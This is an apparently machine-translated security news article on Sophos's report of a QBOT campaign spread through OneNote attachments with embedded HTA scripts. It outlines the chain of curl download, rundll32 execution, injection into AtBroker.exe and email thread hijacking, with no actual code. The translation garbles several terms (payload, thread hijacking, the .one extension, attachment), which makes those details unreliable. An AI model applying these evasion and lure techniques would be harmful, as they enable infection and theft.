SOPHOS IB companies discovered a new QBOT campaign called QAKNOTE, which uses Microsoft Onenote to infect systems with banking trojan.
in new SOPHOS It says that the campaign began on January 31, 2023 and uses Onenote, containing a built-in HTML application (HTA file), which extracts a useful load of malicious in QBOT. About this transition in the QBOT distribution for the first time publicly reported Cynet researcher Max Malyutin on January 31, 2023.
The script in the HTA file uses the legitimate Curl.exe application to download the QBOT DLL file into the “C: ProgramData” folder, and then is performed using Rundll32.exe.
The useful load of QBOT is introduced into the Windows auxiliary technology dispatcher (Windows Assistive Technology Manager, “Atbroker.exe”) to hide its presence and avoid antivirus detection.
SOPHOS reports that QBOT operators use 2 methods for distributing HTA files: the first – sending electronic letters with a built -in reference to the infected file “.On”, and the second is the “implementation of flows”.
The technique of implementing flows is a process when QBOT operators capture the existing email flows and send the message to “answer all” the flow participants, applying the malicious Onenote file as an investment.
To make these attacks even more deceptive for the victims, attackers embed a fake button in the OneNOTE document, which supposedly loads the document from the cloud, but when pressing instead, it launches a built-in HTA. Although after clicking on the button, the user will display a warning about the risk of launching investments, there is always a chance that the victim will ignore him.
Fake button in the file
, as a defense from this new attack vector, Sophos offers the email administrators to consider blocking all files with the extension “.On”, since they are usually not sent in the form of investments.
*Twitter social network is prohibited in the Russian Federation.